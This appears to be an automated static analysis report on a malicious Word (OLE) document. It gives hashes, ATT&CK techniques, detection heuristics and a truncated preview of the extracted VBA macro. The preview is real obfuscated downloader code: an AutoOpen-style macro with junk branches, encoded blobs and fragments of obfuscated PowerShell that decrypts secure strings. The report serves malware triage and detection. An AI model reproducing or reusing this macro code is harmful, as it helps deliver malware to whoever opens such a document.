Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f89f1901898f8bb9…

MALICIOUS

Office (OLE)

154.0 KB Created: 2018-03-21 20:40:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 543dd133fdd39449d1fd09da1124f41e SHA-1: 60d9959de51b02fe6735636bcc7c04727fae39f2 SHA-256: f89f1901898f8bb9b3949e1659f156298003118160dedeba24b62de5a745657a
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The 'AutoOpen' macro, a common auto-execution entry point, is present and utilizes 'CreateObject' to execute obfuscated code. This strongly suggests the macro's purpose is to download and execute a secondary payload, a common technique for malware delivery. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 40974 bytes
SHA-256: 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 19 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
         Case 51809
            Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
            WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
         Case 70984
            JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
            tmoOiN = VdAHd
End Select
Select Case ZWEdXY
         Case 21648
            wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
            CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
         Case 53454
            BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
            MkLAi = BtLcfM
End Select
Select Case IXXHjB
         Case 68930
            zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
            LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
         Case 92161
            iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
            kdYtjY = pjDTFc
End Select
Select Case kvhLGR
         Case 24919
            mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
            uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
         Case 93351
            lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
            ESYjZW = qtFYur
End Select
Select Case pYoLW
         Case 29885
            opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
            jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
         Case 75080
            pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
            wtEsG = bsiOzI
End Select
Select Case MROBr
         Case 90466
            JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
            kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
         Case 85759
            OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
            zJDwo = TCSiUH
End Select
Select Case TojBqK
         Case 39895
            GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
            YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K  107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
         Case 78499
            kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
            dWsKQz = NMmdpb
End Select
Select Case UXsjKl
         Case 78708
            jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
            fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
         Case 1921
            AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
            hlNAaP = onfYsj
End Select
Select Case nlkwv
         Case 81817
            FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
            FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
         Case 94796
     
... (truncated)